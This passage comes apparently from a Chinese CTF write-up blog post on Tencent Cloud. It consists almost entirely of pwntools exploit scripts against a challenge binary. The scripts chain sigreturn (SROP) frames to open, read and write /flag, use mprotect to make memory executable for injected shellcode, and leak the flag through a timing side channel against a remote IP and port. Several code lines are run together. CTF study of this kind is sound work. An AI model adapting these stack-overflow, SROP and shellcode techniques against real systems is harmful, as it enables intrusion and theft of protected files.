opena = SigreturnFrame()          opena.rax = 0                    opena.rdi = 2     opena.rsi = 0x404060                  opena.rdx = 0opena.rcx = 0               opena.rip = elf.plt['syscall']          opena.rbp = 0x404060 + 0x20      opena.rsp = 0x404170read1 = SigreturnFrame()          read1.rax = 0                    read1.rdi = 0                  read1.rsi = 3       read1.rdx = 0x404560read1.rcx = 0x30              read1.rip = elf.plt['syscall']          read1.rbp = 0x404060 + 0x20         read1.rsp = 0x404170+(0x404170-0x404060)-8write = SigreturnFrame()          write.rax = 0                    write.rdi = 1                  write.rsi = 1       write.rdx = 0x404560write.rcx = 0x30             write.rip = elf.plt['syscall']          write.rbp = 0x404060 + 0x20       write.rsp = 0x404170+(0x404170-0x404060)sla("easyhack",b'./flag\x00\x00'+p64(sig)+p64(sy)+flat(opena)+p64(sig)+p64(sy)+flat(read1)+p64(sig)+p64(sy)+flat(write))
sla("SUID?",b'a'*(0x2a)+p64(0x404060)+p64(leave))
p.interactive()

side_channel,initiate!​​​​​​

代码语言:javascript
复制
from pwn import *
context.log_level = 'ERROR'context.terminal = ['wt.exe', 'wsl.exe', 'bash', '-c']context.binary = './chall'binary = context.binary
REMOTE = args.REMOTE or 1
syscall = 0x40118Abss = 0x404060FLAG = '/flag'
code = shellcraft.open(FLAG, 'O_RDONLY', 'rdx')code += shellcraft.read(3, bss+0xE00, 0x100)code += '''    xor eax, eax    mov rdi, 0    mov rsi, 0x404F60    mov rdx, 2    syscall
    movzx rcx, byte ptr [0x404F60]    movzx rax, byte ptr [0x404F61]    movzx rbx, byte ptr [0x404E60+rcx]    cmp rax, rbx    jge L_HANG    jmp L_EXITL_HANG:    xor eax, eax    mov rdi, 0    mov rsi, 0x404F60    mov rdx, 1    syscallL_EXIT:
'''code += shellcraft.exit(0)
shellcode = asm(code)
def test(idx, ch):    if REMOTE:        p = remote('47.108.206.43', 37910)    else:        p = process('./chall')
    pay1 = shellcode    pay1 = pay1.ljust(0x100, b'A')    pay1 += b'A'*0x8    pay1 += p64(0x401193)    pay1 += p64(syscall)
    frame = SigreturnFrame()    frame.rax = constants.SYS_mprotect    frame.rdi = 0x404000    frame.rsi = 0x1000    frame.rdx = 7    frame.rsp = bss+0x210    frame.rip = 0x401186    pay1 += bytes(frame)    pay1 += p64(0x404060)
    # gdb.attach(p, 'b *0x40118E')    # sleep(1)
    p.sendafter(b"easyhack\n", pay1)    p.recvline()        payload = b'A'*0x2A    payload += p64(bss+0x100)    payload += p64(0x401441) # level; ret    p.send(payload)    p.send(p8(idx)+bytes([ch]))        t = time.time()    p.clean(0.3)    t = time.time()-t    p.close()    print(t)    return t > 0.28

flag = ""for i in range(len(flag), 36):    l = 0x2D    r = 0x66    while l < r:        mid = (l+r)//2        res = test(i, mid)        if res:            r = mid        else:            l = mid+1        print(l, r, chr(l), chr(r))    flag += chr(l)    print(flag)
print('flag{'+flag+'}')
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2023-12-24,如有侵权请联系 cloudcommunity@tencent.com 删除
base64
char
unsigned
加密
脚本

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

base64
char
unsigned
加密
脚本
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
LV.
文章
0
获赞
0
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2024 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论